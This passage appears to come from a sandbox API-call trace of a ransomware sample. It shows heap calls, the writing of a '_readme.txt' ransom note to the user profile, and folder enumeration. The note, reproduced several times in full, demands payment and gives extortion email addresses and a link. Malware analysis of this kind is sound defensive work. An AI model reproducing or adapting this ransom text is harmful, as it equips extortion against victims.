Size=0x820) returned 0x2e776e0 [0184.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.801] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.801] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.801] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.801] PathFindFileNameW (pszPath="") returned="" [0184.801] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.802] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.802] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.802] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0184.802] PathAppendW (in: pszPath="C:\\Users\\kEecfMwgj\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned 1 [0184.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0184.802] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned 0 [0184.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.803] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.803] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.803] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\_readme.txt" (normalized: "c:\\users\\keecfmwgj\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x564 [0184.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x2e90ad8 [0184.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85c) returned 0x2e9b770 [0184.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9b770, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 1117 [0184.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e9bfd8 [0184.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9b770 | out: hHeap=0x620000) returned 1 [0184.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e90ad8 | out: hHeap=0x620000) returned 1 [0184.807] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned 1116 [0184.807] WriteFile (in: hFile=0x564, lpBuffer=0x2e9bfd8*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0x312fb64, lpOverlapped=0x0 | out: lpBuffer=0x2e9bfd8*, lpNumberOfBytesWritten=0x312fb64*=0x45c, lpOverlapped=0x0) returned 1 [0184.808] CloseHandle (hObject=0x564) returned 1 [0184.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9bfd8 | out: hHeap=0x620000) returned 1 [0184.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0184.810] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\*" (normalized: "c:\\users\\keecfmwgj\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xda323040, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xda323040, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0184.811] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xda323040, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xda323040, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.811] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0184.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0184.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83688 [0184.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0184.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0184.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.812] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0184.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccab30 [0184.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaad8 [0184.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x2cfe140 [0184.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0184.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0184.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaad8 | out: hHeap=0x620000) returned 1 [0184.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccab30 | out: hHeap=0x620000) returned 1 [0184.813] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0184.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0184.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0184.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x2c3a5b0 [0184.813] RtlAllocateHeap 